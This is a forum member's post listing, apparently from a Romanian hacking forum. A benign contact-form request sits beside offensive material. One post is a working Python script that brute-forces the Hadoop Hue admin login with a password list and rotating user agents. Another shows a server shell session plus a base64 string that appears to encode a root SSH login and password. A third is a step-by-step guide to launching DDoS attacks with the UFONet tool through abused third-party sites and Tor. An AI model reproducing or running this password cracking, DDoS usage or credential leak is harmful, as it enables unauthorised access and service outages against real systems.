Jump to content

loading...

Active Members
  • Posts

    182
  • Joined

  • Last visited

Posts posted by loading...

  1. Salut, imi poate scrie cineva send.php pentru:

    <div id="tooplate_main">


    <h4>Contact Form</h4>

    <form method="post" name="contact" action="#">

    <label for="author">Name:</label>
    <input type="text" id="author" name="author" class="required input_field" />
    <div class="cleaner h10"></div>

    <label for="email">Email:</label>
    <input type="text" class="validate-email required input_field" name="email" id="email" />
    <div class="cleaner h10"></div>

    <label for="subject">Subject:</label>
    <input type="text" class="validate-subject required input_field" name="subject" id="subject"/>
    <div class="cleaner h10"></div>

    <label for="text">Message:</label>
    <textarea id="text" name="text" rows="0" cols="0" class="required"></textarea>
    <div class="cleaner h10"></div>

    <input type="submit" value="Send" id="submit" name="submit" class="submit_btn float_l" />
    <input type="reset" value="Reset" id="reset" name="reset" class="submit_btn float_r" />

    </form>
    </div>
    </div>

    cu redirect catre 'mesajtrimis.html'

    Multumesc

  2. Hadoop User Experience password cracking script. Written in Python.

    #!/usr/bin/python

    import sys

    import requests

    import datetime

    from fake_useragent import UserAgent

    ## CONFIG STARTS HERE ##

    user = "admin"

    host = "hostname:port"

    listfile = "~/dictionaries/top1000-worst-passwords.txt"

    ## CONFIG ENDS HERE##

    dictionary = open(listfile)

    list = dictionary.readlines()

    words = [ ]

    print "Initializing dictionary",

    for entry in list:

    print('.'),

    newword = entry.rstrip("\n")

    words.append(newword)

    print "Now testing "

    for password in words:

    ua = UserAgent().random

    headers = { "User-Agent" : ua }

    post = { "username" : user, "password" : password }

    r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post)

    invalid = r.text.find("Invalid")

    if invalid == -1:

    print "\nSuccess! " + user + ":" + password

    print "Completed test at ",

    print datetime.datetime.now()

    sys.exit()

    else:

    print "...."

    print "Attack unsuccessful...Completed at ",

    Source

  3. server1.local:~# uname -a
    Linux server1.local 2.6.32-431.1.2.0.1.el6.x86_64 #1 SMP Fri Dec 13 13:06:13 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
    server1.local:~# ls
    server1.local:~# uptime
    04:14:51 up 15 days, 1:20, 1 user, load average: 0.00, 0.00, 0.00
    server1.local:~# ls
    server1.local:~# cd
    server1.local:~# cat /proc/cpuinfo
    processor : 0
    vendor_id : GenuineIntel
    cpu family : 6
    model : 23
    model name : Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz
    stepping : 6
    cpu MHz : 2133.305
    cache size : 6144 KB
    physical id : 0
    siblings : 2
    core id : 0
    cpu cores : 2
    apicid : 0
    initial apicid : 0
    fpu : yes
    fpu_exception : yes
    cpuid level : 10
    wp : yes
    flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
    bogomips : 4270.03
    clflush size : 64
    cache_alignment : 64
    address sizes : 36 bits physical, 48 bits virtual
    power management:

    processor : 1
    vendor_id : GenuineIntel
    cpu family : 6
    model : 23
    model name : Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz
    stepping : 6
    cpu MHz : 2133.305
    cache size : 6144 KB
    physical id : 0
    siblings : 2
    core id : 1
    cpu cores : 2
    apicid : 1
    initial apicid : 1
    fpu : yes
    fpu_exception : yes
    cpuid level : 10
    wp : yes
    flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
    bogomips : 4266.61
    clflush size : 64
    cache_alignment : 64
    address sizes : 36 bits physical, 48 bits virtual
    power management:

    server1.local:~#

    c3NoIHJvb3RANzguNDcuNDUuMzQNCjFsMFZleTB1MTIz

    b64

    • Project info:

    - Package: UFOnet_v0.2b(.zip)

    - Code: Github / Sf

    • Summary:

    UFONet - is a shell client designed to launch DDoS attacks against a target,

    using CSRF/XSS vectors on third party web applications, like botnet.

    It allows to use a proxy to manage 'zombies'.

    • Installing:

    UFONet runs on many platforms. It requires Python and the following library:

           python-pycurl - Python bindings to libcurl

    On Debian-based systems (ex: Ubuntu), run:

           sudo apt-get install python-pycurl

    • Testing botnet:

    Open 'zombies.txt' (or another file) and create a list of possible 'zombies'.

    Urls of the 'zombies' should be like this:

           http://target.com/check?uri=

    After that, launch it:

           ./ufonet -t zombies.txt

    At the end of the process, you will be asked if you want to update the list

    automatically adding only 'vulnerable' web apps.

           Wanna update your list (Y/n)

    -------------

    Examples:

         + with verbose:     ./ufonet -t zombies.txt -v
    + with proxy TOR: ./ufonet -t zombies.txt --proxy="http://127.0.0.1:8118"

    • Attacking a target:

    Enter the target to attack, with the number of rounds that will be attacked:


    ./ufonet -a http://target.comTarget -r 10

    This will attack the target, with the list of 'zombies' that your provided on: "zombies.txt",

    a number of 10 times for each 'zombie'. That means, that if you have a list of 1.000 'zombies',

    the program will launch 1.000 'zombies' x 10 rounds = 10.000 'hits' to the target.

    By default, if you don't put any round, it will apply only 1.

    Additionally, you can choose a place to recharge on target's site. For example, a large image,

    a big size file or a flash movie. In some scenarios where targets doesn't use cache systems,

    this will do the attack more effective.


    ./ufonet -a http://target.com -b "/images/big_size_image.jpg"

    -------------

    Examples:


    + with verbose: ./ufonet -a http://target.com -r 10 -v
    + with proxy TOR: ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
    + with a place: ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"

    Source & Video: UFONet - DDoS attacks via Web Abuse (XSS/CSRF)

×
×
  • Create New...